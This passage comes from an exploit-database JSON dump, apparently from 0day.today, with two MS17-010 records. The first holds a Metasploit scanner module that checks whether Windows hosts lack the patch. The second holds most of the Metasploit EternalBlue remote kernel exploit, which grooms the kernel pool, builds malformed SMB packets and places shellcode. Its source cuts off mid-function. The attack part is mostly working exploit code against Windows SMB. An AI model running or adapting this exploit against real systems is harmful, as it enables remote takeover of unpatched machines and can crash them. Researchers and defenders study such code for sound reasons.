"idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", 
"THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2018-01-10T11:22:44", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/27613", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\n# auxiliary/scanner/smb/smb_ms_17_010\r\n \r\nrequire 'msf/core'\r\n \r\nclass MetasploitModule < Msf::Auxiliary\r\n \r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Exploit::Remote::SMB::Client::Authenticated\r\n \r\n include Msf::Auxiliary::Scanner\r\n include Msf::Auxiliary::Report\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MS17-010 SMB RCE Detection',\r\n 'Description' => %q{\r\n Uses information disclosure to determine if MS17-010 has been patched or not.\r\n Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.\r\n If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does\r\n not have the MS17-010 patch.\r\n \r\n This module does not require valid SMB credentials in default server\r\n configurations. 
It can log on as the user \"\\\" and connect to IPC$.\r\n },\r\n 'Author' => [ 'Sean Dillon <[email\u00a0protected]>' ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2017-0143'],\r\n [ 'CVE', '2017-0144'],\r\n [ 'CVE', '2017-0145'],\r\n [ 'CVE', '2017-0146'],\r\n [ 'CVE', '2017-0147'],\r\n [ 'CVE', '2017-0148'],\r\n [ 'MSB', 'MS17-010'],\r\n [ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx']\r\n ],\r\n 'License' => MSF_LICENSE\r\n ))\r\n end\r\n \r\n def run_host(ip)\r\n begin\r\n status = do_smb_probe(ip)\r\n \r\n if status == \"STATUS_INSUFF_SERVER_RESOURCES\"\r\n print_warning(\"Host is likely VULNERABLE to MS17-010!\")\r\n report_vuln(\r\n host: ip,\r\n name: self.name,\r\n refs: self.references,\r\n info: 'STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$'\r\n )\r\n elsif status == \"STATUS_ACCESS_DENIED\" or status == \"STATUS_INVALID_HANDLE\"\r\n # STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others)\r\n print_good(\"Host does NOT appear vulnerable.\")\r\n else\r\n print_bad(\"Unable to properly detect if host is vulnerable.\")\r\n end\r\n \r\n rescue ::Interrupt\r\n print_status(\"Exiting on interrupt.\")\r\n raise $!\r\n rescue ::Rex::Proto::SMB::Exceptions::LoginError\r\n print_error(\"An SMB Login Error occurred while connecting to the IPC$ tree.\")\r\n rescue ::Exception => e\r\n vprint_error(\"#{e.class}: #{e.message}\")\r\n ensure\r\n disconnect\r\n end\r\n end\r\n \r\n def do_smb_probe(ip)\r\n connect\r\n \r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n \r\n # connect to IPC$\r\n ipc_share = \"\\\\\\\\#{ip}\\\\IPC$\"\r\n simple.connect(ipc_share)\r\n tree_id = simple.shares[ipc_share]\r\n \r\n print_status(\"Connected to #{ipc_share} with TID = #{tree_id}\")\r\n \r\n # request transaction with fid = 0\r\n pkt = make_smb_trans_ms17_010(tree_id)\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n \r\n # convert packet to response 
struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n \r\n # convert error code to string\r\n code = pkt['SMB'].v['ErrorClass']\r\n smberr = Rex::Proto::SMB::Exceptions::ErrorCode.new\r\n status = smberr.get_error(code)\r\n \r\n print_status(\"Received #{status} with FID = 0\")\r\n status\r\n end\r\n \r\n def make_smb_trans_ms17_010(tree_id)\r\n # make a raw transaction packet\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n \r\n # opcode 0x23 = PeekNamedPipe, fid = 0\r\n setup = \"\\x23\\x00\\x00\\x00\"\r\n setup_count = 2 # 2 words\r\n trans = \"\\\\PIPE\\\\\\x00\"\r\n \r\n # calculate offsets to the SetupData payload\r\n base_offset = pkt.to_s.length + (setup.length) - 4\r\n param_offset = base_offset + trans.length\r\n data_offset = param_offset # + 0\r\n \r\n # packet baselines\r\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode\r\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload'].v['ParamCountMax'] = 0xffff\r\n pkt['Payload'].v['DataCountMax'] = 0xffff\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n \r\n # actual magic: PeekNamedPipe FID=0, \\PIPE\\\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup\r\n pkt['Payload'].v['Payload'] = trans\r\n \r\n pkt.to_s\r\n end\r\nend\n\n# 0day.today [2018-01-10] #", "_object_type": "robots.models.zdt.ZDTBulletin", "_object_types": ["robots.models.zdt.ZDTBulletin", "robots.models.base.Bulletin"]}, {"id": "1337DAY-ID-27786", "hash": "357c2726c884a3517306631cad497f2c", "type": "zdt", "bulletinFamily": "exploit", "title": "Microsoft Windows MS17-010 EternalBlue SMB Remote Windows 
Kernel Pool Corruption Exploit", "description": "This Metasploit module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow in a memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with a mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that the overflow is well laid-out to overwrite an SMBv1 buffer. The actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original, may not trigger 100% of the time and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool-down period before the shells rain in again. Note that each attempt corrupts kernel (non-paged) pool memory, so a failed attempt may leave the target unstable; weigh this before retrying against hosts you cannot afford to crash.", "published": "2017-05-17T00:00:00", "modified": "2017-05-17T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/27786", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2018-04-12T21:52:02", "history": [], "viewCount": 351, "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2018-04-12T21:52:02", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": 
"exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, 
{"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2018-04-12T21:52:02", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/27786", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'ruby_smb'\r\nrequire 'ruby_smb/smb1/packet'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n\r\n def initialize(info = {})\r\n 
super(update_info(info,\r\n 'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',\r\n 'Description' => %q{\r\n This module is a port of the Equation Group ETERNALBLUE exploit, part of\r\n the FuzzBunch toolkit released by Shadow Brokers.\r\n\r\n There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\r\n is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\r\n DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\r\n is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later\r\n completed in srvnet!SrvNetWskReceiveComplete.\r\n\r\n This exploit, like the original may not trigger 100% of the time, and should be\r\n run continuously until triggered. It seems like the pool will get hot streaks\r\n and need a cool down period before the shells rain in again.\r\n },\r\n\r\n 'Author' => [\r\n 'Sean Dillon <[email\u00a0protected]>', # @zerosum0x0\r\n 'Dylan Davis <[email\u00a0protected]>', # @jennamagius\r\n 'Equation Group',\r\n 'Shadow Brokers'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'MSB', 'MS17-010' ],\r\n [ 'CVE', '2017-0143' ],\r\n [ 'CVE', '2017-0144' ],\r\n [ 'CVE', '2017-0145' ],\r\n [ 'CVE', '2017-0146' ],\r\n [ 'CVE', '2017-0147' ],\r\n [ 'CVE', '2017-0148' ],\r\n [ 'URL', 'https://github.com/RiskSense-Ops/MS17-010' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread',\r\n },\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'Space' => 2000, # this can be more, needs to be recalculated\r\n 'EncoderType' => Msf::Encoder::Type::Raw,\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows 7 and Server 2008 (x64) All Service Packs',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => [ ARCH_X64 ],\r\n\r\n 'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset\r\n 'et_alertable' => 0x4c, # ETHREAD.Alertable offset\r\n 'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset\r\n 'et_tle' => 0x420 # 
ETHREAD.ThreadListEntry offset\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Mar 14 2017'\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(445),\r\n OptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]),\r\n OptInt.new( 'MaxExploitAttempts', [ true, \"The number of times to retry the exploit.\", 3 ] ),\r\n OptInt.new( 'GroomAllocations', [ true, \"Initial number of times to groom the kernel pool.\", 12 ] ),\r\n OptInt.new( 'GroomDelta', [ true, \"The amount to increase the groom count by per try.\", 5 ] )\r\n ])\r\n end\r\n\r\n def check\r\n # todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010\r\n end\r\n\r\n def exploit\r\n begin\r\n for i in 1..datastore['MaxExploitAttempts']\r\n\r\n grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)\r\n\r\n smb_eternalblue(datastore['ProcessName'], grooms)\r\n\r\n # we don't need this sleep, and need to find a way to remove it\r\n # problem is session_count won't increment until stage is complete :\\\r\n secs = 0\r\n while !session_created? 
and secs < 5\r\n secs += 1\r\n sleep 1\r\n end\r\n\r\n if session_created?\r\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\r\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\r\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\r\n break\r\n else\r\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\r\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\r\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\r\n end\r\n end\r\n\r\n rescue ::RubySMB::Error::UnexpectedStatusCode,\r\n ::Errno::ECONNRESET,\r\n ::Rex::HostUnreachable,\r\n ::Rex::ConnectionTimeout,\r\n ::Rex::ConnectionRefused => e\r\n print_bad(\"#{e.class}: #{e.message}\")\r\n rescue => error\r\n print_bad(error.class.to_s)\r\n print_bad(error.message)\r\n print_bad(error.backtrace.join(\"\\n\"))\r\n ensure\r\n # pass\r\n end\r\n end\r\n\r\n #\r\n # Increase the default delay by five seconds since some kernel-mode\r\n # payloads may not run immediately.\r\n #\r\n def wfs_delay\r\n super + 5\r\n end\r\n\r\n def smb_eternalblue(process_name, grooms)\r\n begin\r\n # Step 0: pre-calculate what we can\r\n shellcode = make_kernel_user_payload(payload.encode, 0, 0, 0, 0, 0)\r\n payload_hdr_pkt = make_smb2_payload_headers_packet\r\n payload_body_pkt = make_smb2_payload_body_packet(shellcode)\r\n\r\n # Step 1: Connect to IPC$ share\r\n print_status(\"Connecting to target for exploitation.\")\r\n client, tree, sock = smb1_anonymous_connect_ipc()\r\n print_good(\"Connection established for exploitation.\")\r\n\r\n print_status(\"Trying exploit with #{grooms} Groom Allocations.\")\r\n\r\n # Step 2: Create a large SMB1 buffer\r\n print_status(\"Sending all but last fragment of exploit packet\")\r\n smb1_large_buffer(client, tree, sock)\r\n\r\n # Step 3: Groom the pool with payload packets, and open/close SMB1 packets\r\n print_status(\"Starting 
non-paged pool grooming\")\r\n\r\n # initialize_groom_threads(ip, port, payload, grooms)\r\n fhs_sock = smb1_free_hole(true)\r\n\r\n @groom_socks = []\r\n\r\n print_good(\"Sending SMBv2 buffers\")\r\n smb2_grooms(grooms, payload_hdr_pkt)\r\n\r\n fhf_sock = smb1_free_hole(false)\r\n\r\n print_good(\"Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\")\r\n fhs_sock.shutdown()\r\n\r\n print_status(\"Sending final SMBv2 buffers.\") # 6x\r\n smb2_grooms(6, payload_hdr_pkt) # todo: magic #\r\n\r\n fhf_sock.shutdown()\r\n\r\n print_status(\"Sending last fragment of exploit packet!\")\r\n final_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15)\r\n sock.put(final_exploit_pkt)\r\n\r\n print_status(\"Receiving response from exploit packet\")\r\n code, raw = smb1_get_response(sock)\r\n\r\n if code == 0xc000000d #STATUS_INVALID_PARAMETER (0xC000000D)\r\n print_good(\"ETERNALBLUE overwrite completed successfully (0xC000000D)!\")\r\n end\r\n\r\n # Step 4: Send the payload\r\n print_status(\"Sending egg to corrupted connection.\")\r\n\r\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt.first(2920)) }\r\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) }\r\n\r\n print_status(\"Triggering free of corrupted buffer.\")\r\n # tree disconnect\r\n # logoff and x\r\n # note: these aren't necessary, just close the sockets\r\n\r\n ensure\r\n abort_sockets\r\n end\r\n end\r\n\r\n def smb2_grooms(grooms, payload_hdr_pkt)\r\n grooms.times do |groom_id|\r\n gsock = connect(false)\r\n @groom_socks << gsock\r\n gsock.put(payload_hdr_pkt)\r\n end\r\n end\r\n\r\n def smb1_anonymous_connect_ipc()\r\n sock = connect(false)\r\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\r\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '')\r\n client.negotiate\r\n\r\n pkt = make_smb1_anonymous_login_packet\r\n sock.put(pkt)\r\n\r\n code, raw, response = 
smb1_get_response(sock)\r\n\r\n unless code == 0 # WindowsError::NTStatus::STATUS_SUCCESS\r\n raise RubySMB::Error::UnexpectedStatusCode, \"Error with anonymous login\"\r\n end\r\n\r\n client.user_id = response.uid\r\n\r\n tree = client.tree_connect(\"\\\\\\\\#{datastore['RHOST']}\\\\IPC$\")\r\n\r\n return client, tree, sock\r\n end\r\n\r\n def smb1_large_buffer(client, tree, sock)\r\n nt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id)\r\n\r\n # send NT Trans\r\n vprint_status(\"Sending NT Trans Request packet\")\r\n sock.put(nt_trans_pkt)\r\n\r\n vprint_status(\"Receiving NT Trans packet\")\r\n raw = sock.get_once\r\n\r\n # Initial Trans2 request\r\n trans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0)\r\n\r\n # send all but last packet\r\n for i in 1..14\r\n trans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i)\r\n end\r\n\r\n trans2_pkt_nulled << make_smb1_echo_packet(tree.id, client.user_id)\r\n\r\n vprint_status(\"Sending malformed Trans2 packets\")\r\n sock.put(trans2_pkt_nulled)\r\n\r\n sock.get_once\r\n end\r\n\r\n def smb1_free_hole(start)\r\n sock = connect(false)\r\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\r\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '')\r\n client.negotiate\r\n\r\n pkt = \"\"\r\n\r\n if start\r\n vprint_status(\"Sending start free hole packet.\")\r\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\xc0\", \"\\x2d\\x01\", \"\\xf0\\xff\\x00\\x00\\x00\")\r\n else\r\n vprint_status(\"Sending end free hole packet.\")\r\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\x40\", \"\\x2c\\x01\", \"\\xf8\\x87\\x00\\x00\\x00\")\r\n end\r\n\r\n #dump_packet(pkt)\r\n sock.put(pkt)\r\n\r\n vprint_status(\"Receiving free hole response.\")\r\n sock.get_once\r\n\r\n return sock\r\n end\r\n\r\n def smb1_get_response(sock)\r\n raw = sock.get_once\r\n response = 
RubySMB::SMB1::SMBHeader.read(raw[4..-1])\r\n code = response.nt_status\r\n return code, raw, response\r\n end\r\n\r\n def make_smb2_payload_headers_packet\r\n # don't need a library here, the packet is essentially nonsensical\r\n pkt = \"\"\r\n pkt << \"\\x00\" # session message\r\n pkt << \"\\x00\\xff\\xf7\" # size\r\n pkt << \"\\xfeSMB\" # SMB2\r\n pkt << \"\\x00\" * 124\r\n\r\n pkt\r\n end\r\n\r\n def make_smb2_payload_body_packet(kernel_user_payload)\r\n # precalculated lengths\r\n pkt_max_len = 4204\r\n pkt_setup_len = 497\r\n pkt_max_payload = pkt_max_len - pkt_setup_len # 3575\r\n\r\n # this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode\r\n pkt = \"\"\r\n\r\n # padding\r\n pkt << \"\\x00\" * 0x8\r\n pkt << \"\\x03\\x00\\x00\\x00\"\r\n pkt << \"\\x00\" * 0x1c\r\n pkt << \"\\x03\\x00\\x00\\x00\"\r\n pkt << \"\\x00\" * 0x74\r\n\r\n # KI_USER_SHARED_DATA addresses\r\n pkt << \"\\xb0\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" * 2 # x64 address\r\n pkt << \"\\x00\" * 0x10\r\n pkt << \"\\xc0\\xf0\\xdf\\xff\" * 2 # x86 address\r\n pkt << \"\\x00\" * 0xc4\r\n\r\n # payload addreses\r\n pkt << \"\\x90\\xf1\\xdf\\xff\"\r\n pkt << \"\\x00\" * 0x4\r\n pkt << \"\\xf0\\xf1\\xdf\\xff\"\r\n pkt << \"\\x00\" * 0x40\r\n\r\n pkt << \"\\xf0\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\r\n pkt << \"\\x00\" * 0x8\r\n pkt << \"\\x00\\x02\\xd0\\xff\\xff\\xff\\xff\\xff\"\r\n pkt << \"\\x00\"\r\n\r\n pkt << kernel_user_payload\r\n\r\n # fill out the rest, this can be randomly generated\r\n pkt << \"\\x00\" * (pkt_max_payload - kernel_user_payload.length)\r\n\r\n pkt\r\n end\r\n\r\n def make_smb1_echo_packet(tree_id, user_id)\r\n pkt = \"\"\r\n pkt << \"\\x00\" # type\r\n pkt << \"\\x00\\x00\\x31\" # len = 49\r\n pkt << \"\\xffSMB\" # SMB1\r\n pkt << \"\\x2b\" # Echo\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Success\r\n pkt << \"\\x18\" # flags\r\n pkt << \"\\x07\\xc0\" # flags2\r\n pkt << \"\\x00\\x00\" # PID High\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature1\r\n pkt << 
\"\\x00\\x00\\x00\\x00\" # Signature2\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << [tree_id].pack(\"S>\") # Tree ID\r\n pkt << \"\\xff\\xfe\" # PID\r\n pkt << [user_id].pack(\"S>\") # UserID\r\n pkt << \"\\x40\\x00\" # MultiplexIDs\r\n\r\n pkt << \"\\x01\" # Word count\r\n pkt << \"\\x01\\x00\" # Echo count\r\n pkt << \"\\x0c\\x00\" # Byte count\r\n\r\n # echo data\r\n # this is an existing IDS signature, and can be nulled out\r\n #pkt << \"\\x4a\\x6c\\x4a\\x6d\\x49\\x68\\x43\\x6c\\x42\\x73\\x72\\x00\"\r\n pkt << \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x00\"\r\n\r\n pkt\r\n end\r\n\r\n # Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit\r\n def make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout)\r\n timeout = (timeout * 0x10) + 3\r\n\r\n pkt = \"\"\r\n pkt << \"\\x00\" # Session message\r\n pkt << \"\\x00\\x10\\x35\" # length\r\n pkt << \"\\xffSMB\" # SMB1\r\n pkt << \"\\x33\" # Trans2 request\r\n pkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS\r\n pkt << \"\\x18\" # Flags\r\n pkt << \"\\x07\\xc0\" # Flags2\r\n pkt << \"\\x00\\x00\" # PID High\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature1\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature2\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << [tree_id].pack(\"S>\") # TreeID\r\n pkt << \"\\xff\\xfe\" # PID\r\n pkt << [user_id].pack(\"S>\") # UserID\r\n pkt << \"\\x40\\x00\" # MultiplexIDs\r\n\r\n pkt << \"\\x09\" # Word Count\r\n pkt << \"\\x00\\x00\" # Total Param Count\r\n pkt << \"\\x00\\x10\" # Total Data Count\r\n pkt << \"\\x00\\x00\" # Max Param Count\r\n pkt << \"\\x00\\x00\" 